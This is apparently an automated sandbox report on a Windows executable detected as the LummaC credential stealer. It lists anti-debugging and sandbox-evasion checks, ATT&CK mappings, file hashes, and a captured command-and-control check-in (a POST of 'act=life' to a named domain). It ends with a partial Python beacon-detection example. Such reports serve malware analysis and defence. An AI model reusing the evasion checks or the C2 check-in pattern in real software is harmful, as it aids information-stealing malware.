Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D0AD4 second address: 12D0AF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D0AF7 second address: 12D0AFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D0AFB second address: 12D0B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D1E73 second address: 12D1E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D1E79 second address: 12D1E9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F9668C559D6h 0x0000000d jmp 00007F9668C559E4h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D3E3A second address: 12D3E4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9668BCCCCAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11EFD0A second address: 11EFD10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 103CA46 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 103C947 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 103A1A6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 11F4932 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 12675C4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe TID: 7044 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7044 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, file.exe, 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1576433185.0000000001B43000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW;
Source: file.exe, 00000000.00000002.1576433185.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576433185.0000000001B43000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0101DF70 LdrInitializeThunk,0_2_0101DF70
Source: file.exe, file.exe, 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: >Program Manager
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (count of matching behavior signatures in parentheses)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (2); At; Cron; Launchd
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: Virtualization/Sandbox Evasion (24); Process Injection (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery (631); Virtualization/Sandbox Evasion (24); Process Discovery (2); System Information Discovery (223); Internet Connection Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (13); Protocol Impersonation; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://crl.m8 | 0% | Avira URL Cloud | safe
https://property-imper.sbs/Q | 0% | Avira URL Cloud | safe
https://property-imper.sbs/apiS | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
property-imper.sbs | 172.67.162.84 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://property-imper.sbs/api | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://property-imper.sbs/apiS | file.exe, 00000000.00000002.1576433185.0000000001ADE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://property-imper.sbs/Q | file.exe, 00000000.00000003.1574365474.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576727210.0000000001B97000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://property-imper.sbs/q | file.exe, 00000000.00000003.1574365474.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576727210.0000000001B97000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://property-imper.sbs/ | file.exe, 00000000.00000003.1574365474.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576727210.0000000001B97000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.m8 | file.exe, 00000000.00000002.1576433185.0000000001B8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1574657240.0000000001B8B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.162.84 | property-imper.sbs | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561818
Start date and time: 2024-11-24 11:32:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.evad.winEXE@1/0@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
Time | Type | Description
05:33:27 | API Interceptor | 2x Sleep call for process: file.exe modified
Match: 172.67.162.84
Associated Sample Name / URL | Detection | Threat Name
file.exe | malicious | LummaC Stealer
file.exe | malicious | LummaC Stealer
file.exe | malicious | LummaC Stealer
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
file.exe | malicious | LummaC Stealer
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar
file.exe | malicious | LummaC Stealer
file.exe | malicious | LummaC Stealer
2fQ8fpTWAP.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc
file.exe | malicious | LummaC Stealer

Match: property-imper.sbs
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 104.21.33.116
file.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 172.67.162.84
file.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar | 172.67.162.84
file.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | LummaC Stealer | 104.21.33.116
file.exe | malicious | Unknown | 104.21.33.116

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
zapret.exe | malicious | Unknown | 104.26.13.205
file.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 172.64.41.3
IaslcsMo.txt.ps1 | malicious | LummaC Stealer | 172.67.75.40
file.exe | malicious | LummaC Stealer | 172.67.162.84
7jBzTH9FXQ.exe | malicious | Unknown | 104.18.167.46
file.exe | malicious | LummaC Stealer | 172.67.162.84
7jBzTH9FXQ.exe | malicious | Unknown | 104.18.166.46
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 172.67.162.84
santi.exe | malicious | FormBook | 104.21.88.139

Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 172.67.162.84
IaslcsMo.txt.ps1 | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 172.67.162.84
ZjH6H6xqo7.exe | malicious | LummaC | 172.67.162.84
file.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | LummaC | 172.67.162.84
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar | 172.67.162.84
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.947024841870626
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'867'776 bytes
MD5: c7ffd9f68af166bc332ad19be70c3b5c
SHA1: e19af1c281e963bdb378dd17b84706c51a87bb19
SHA256: 0b2957e10a9d6c29a680e112571ea46be5fedeac0ecc6f0097337f40d61a4cb1
SHA512: 56f5561297df2dfec098f07c5d3d6e922f81fa9de62c99582fd4e45479a3234c6047c8f12baa6f18ba156766bf063515f478435b46380e75f5cad355655b2802
SSDEEP: 24576:5BI6xI2pdMvYT8/LRuYr/TKG9uvZU+ZCvPOZpB0oBytu+enRN2AeWkAFcWXYUSwF:fVK0GvYT874vZGH+0KqoYz+/1IoCnl
TLSH: 1C8533E56F8ABFB4CAD0E0300BFF22B73F2D85A50D6151A5A90271F55B33D61876AD02
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g..............................I...........@...........................I...........@.................................\...p..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x89c000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              jmp 00007F9668BF53CAh
                              divps xmm3, dqword ptr [eax+eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jmp 00007F9668BF73C5h
                              add byte ptr [edx+ecx], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              xor byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              and al, 00h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              and dword ptr [eax], eax
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              push es
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add eax, 0000000Ah
                              add byte ptr [eax], al
                              add byte ptr [eax], dl
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [esi], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [esi], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add al, 0Ah
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              xor byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add al, 00h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add dword ptr [eax+00000000h], eax
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add al, 0Ah
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              xor byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              mov cl, 80h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5805c | 0x70 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x57000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x581f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x56000 | 0x26200 | 606ff50e8267368bfb6e97cba852b6da | False | 0.9992699795081967 | data | 7.982113095110462 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x57000 | 0x2b0 | 0x200 | e39ce63b21796d11090cbfe77a2cd04f | False | 0.791015625 | data | 6.001086040172281 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x58000 | 0x1000 | 0x200 | c92ced077364b300efd06b14c70a61dc | False | 0.15625 | data | 1.1194718105633323 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x59000 | 0x2a4000 | 0x200 | 591c3dac2be47af0609bb0153e587588 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fwtvsnnj | 0x2fd000 | 0x19e000 | 0x19e000 | 5eb06bdff4fa27277e4fbaed49712cd9 | False | 0.9945599099864131 | data | 7.953020845003473 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vcdokcsv | 0x49b000 | 0x1000 | 0x600 | b1f36fe4e0fcd94f7064a17da5b58031 | False | 0.5729166666666666 | data | 4.90685177919293 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x49c000 | 0x3000 | 0x2200 | 11deb9afd46cfdbaa55f9f8e6a3ef22a | False | 0.08340992647058823 | DOS executable (COM) | 0.9362518713449475 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x49ad88 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-24T11:33:27.539212+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49705 | 172.67.162.84 | 443 | TCP
2024-11-24T11:33:28.262223+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49705 | 172.67.162.84 | 443 | TCP
2024-11-24T11:33:28.262223+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49705 | 172.67.162.84 | 443 | TCP
2024-11-24T11:33:29.516196+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49706 | 172.67.162.84 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 24, 2024 11:33:26.199892998 CET | 49705 | 443 | 192.168.2.8 | 172.67.162.84
Nov 24, 2024 11:33:26.199927092 CET | 443 | 49705 | 172.67.162.84 | 192.168.2.8
Nov 24, 2024 11:33:26.200004101 CET | 49705 | 443 | 192.168.2.8 | 172.67.162.84
Nov 24, 2024 11:33:26.214581966 CET | 49705 | 443 | 192.168.2.8 | 172.67.162.84
Nov 24, 2024 11:33:26.214601040 CET | 443 | 49705 | 172.67.162.84 | 192.168.2.8
Nov 24, 2024 11:33:27.539093971 CET | 443 | 49705 | 172.67.162.84 | 192.168.2.8
Nov 24, 2024 11:33:27.539211988 CET | 49705 | 443 | 192.168.2.8 | 172.67.162.84
Nov 24, 2024 11:33:27.543703079 CET | 49705 | 443 | 192.168.2.8 | 172.67.162.84
Nov 24, 2024 11:33:27.543710947 CET | 443 | 49705 | 172.67.162.84 | 192.168.2.8
Nov 24, 2024 11:33:27.544030905 CET | 443 | 49705 | 172.67.162.84 | 192.168.2.8
Nov 24, 2024 11:33:27.592487097 CET | 49705 | 443 | 192.168.2.8 | 172.67.162.84
Nov 24, 2024 11:33:27.592487097 CET | 49705 | 443 | 192.168.2.8 | 172.67.162.84
Nov 24, 2024 11:33:27.592582941 CET | 443 | 49705 | 172.67.162.84 | 192.168.2.8
Nov 24, 2024 11:33:28.262240887 CET | 443 | 49705 | 172.67.162.84 | 192.168.2.8
Nov 24, 2024 11:33:28.262340069 CET | 443 | 49705 | 172.67.162.84 | 192.168.2.8
Nov 24, 2024 11:33:28.262404919 CET | 49705 | 443 | 192.168.2.8 | 172.67.162.84
Nov 24, 2024 11:33:28.265090942 CET | 49705 | 443 | 192.168.2.8 | 172.67.162.84
Nov 24, 2024 11:33:28.265109062 CET | 443 | 49705 | 172.67.162.84 | 192.168.2.8
Nov 24, 2024 11:33:28.317913055 CET | 49706 | 443 | 192.168.2.8 | 172.67.162.84
Nov 24, 2024 11:33:28.317961931 CET | 443 | 49706 | 172.67.162.84 | 192.168.2.8
Nov 24, 2024 11:33:28.318049908 CET | 49706 | 443 | 192.168.2.8 | 172.67.162.84
Nov 24, 2024 11:33:28.318387032 CET | 49706 | 443 | 192.168.2.8 | 172.67.162.84
Nov 24, 2024 11:33:28.318401098 CET | 443 | 49706 | 172.67.162.84 | 192.168.2.8
Nov 24, 2024 11:33:29.516196012 CET | 49706 | 443 | 192.168.2.8 | 172.67.162.84
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 24, 2024 11:33:25.697555065 CET | 60256 | 53 | 192.168.2.8 | 1.1.1.1
Nov 24, 2024 11:33:26.019197941 CET | 53 | 60256 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 24, 2024 11:33:25.697555065 CET | 192.168.2.8 | 1.1.1.1 | 0x55f0 | Standard query (0) | property-imper.sbs | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 24, 2024 11:33:26.019197941 CET | 1.1.1.1 | 192.168.2.8 | 0x55f0 | No error (0) | property-imper.sbs | | 172.67.162.84 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:33:26.019197941 CET | 1.1.1.1 | 192.168.2.8 | 0x55f0 | No error (0) | property-imper.sbs | | 104.21.33.116 | A (IP address) | IN (0x0001) | false
                              • property-imper.sbs
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.849705172.67.162.844431644C:\Users\user\Desktop\file.exe
                              Timestamp                Bytes transferred  Direction  Data
                              2024-11-24 10:33:27 UTC  265                OUT        POST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 8
                              Host: property-imper.sbs
                              2024-11-24 10:33:27 UTC  8                  OUT        Data Raw: 61 63 74 3d 6c 69 66 65
                              Data Ascii: act=life
                              2024-11-24 10:33:28 UTC  1023               IN         HTTP/1.1 200 OK
                              Date: Sun, 24 Nov 2024 10:33:28 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: PHPSESSID=i0u5nq0e708305nu3leec7mi5p; expires=Thu, 20-Mar-2025 04:20:07 GMT; Max-Age=9999999; path=/
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kh8qZpGeZo5xHnpU%2F%2Fe4yzzpRQ5h4UGcpGaiu%2BKoa3fm43I5NSoRbZ4NHcrYl37oWcH9inI%2B7MDERTR%2BfjtCdjJxXYVhNmY%2B8tTk2ltYigUp%2FiOYHYGIZKW8%2BqShpgXkqxMLSWQ%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8e78bdacdb260c76-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1629&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1784841&cwnd=138&unsent_bytes=0&cid=8b6282ff3843ad97&ts=735&x=0"
                              2024-11-24 10:33:28 UTC  7                  IN         Data Raw: 32 0d 0a 6f 6b 0d 0a
                              Data Ascii: 2ok (chunked framing: chunk size "2", CRLF, chunk data "ok", CRLF)
                              2024-11-24 10:33:28 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0 (terminating zero-length chunk; the decoded response body is just "ok")
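The check-in above (a POST to /api with the form body act=life, answered with a chunked "ok") is the only application-layer traffic the report records. The following is an added example, not part of the Joe Sandbox report and not code from the sample: it reconstructs the two messages from the page as byte strings, parses them, decodes the chunked response body the way the report's "2ok" / "0" lines have to be read, and flags an exchange of this shape. The field names, the `is_life_beacon()` rule and the trimmed response header set are this example's own assumptions.

```python
"""Parse the captured check-in and flag it as a beacon of the observed shape.

Added example, not part of the Joe Sandbox report. The two byte strings are
reconstructed from the request/response shown on the page (constructed sample
input); the TLS/TCP layer is not modelled.
"""
from dataclasses import dataclass, field
from urllib.parse import parse_qs

# Reconstructed from the report's HTTP session (constructed sample input).
REQUEST = (
    b"POST /api HTTP/1.1\r\n"
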